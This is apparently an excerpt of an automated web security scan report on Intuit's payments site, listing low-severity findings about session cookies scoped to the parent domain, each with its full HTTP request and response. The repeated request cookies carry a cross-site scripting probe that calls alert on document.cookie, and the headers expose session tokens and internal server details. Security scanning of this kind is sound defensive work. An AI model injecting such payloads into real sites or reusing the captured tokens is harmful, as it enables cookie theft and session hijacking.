x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161255


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.4. http://payments.intuit.com/apply-now/contact-me.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=cku87sFcjQeXf4yvDjeRwQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955F0380A0805192AA117E39D49C0E7
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93193


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.5. http://payments.intuit.com/products/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:06 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=KuH0v64gzcCOU-AFN-G2sg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:07 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9558F560A0805192AA117E38514C1B8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90285


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.6. http://payments.intuit.com/products/basic-payment-solutions/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:06 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=N1WxP2tCjmwle9wWUIZ0ZA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:07 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95590A10A0805192AA117E393511CD3
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92523


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.7. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ymN4fXSK4DMbTyTO7aM1cg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955A0C80A0805192AA117E31BD1DFC9
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101690


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.8. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Nxf9rXE5DPm2krW37+O0eA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9559E7F0A0805192AA117E31396879F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134799


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.9. http://payments.intuit.com/products/basic-payment-solutions/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=e8x54NAl9m5AKOxJR+wP-A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955A0A60A0805192AA117E3A81180D3
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92524


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.10. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:07 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=b0cWeAq2eG1uGvhkSVuNFw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:08 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95591890A0805192AA117E3A5843518
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151680


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.11. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:11 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=9-HAeogU3gmn3wP+HGc0sw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:12 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955A3400A0805192AA117E3F700FFB1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110626


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.12. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
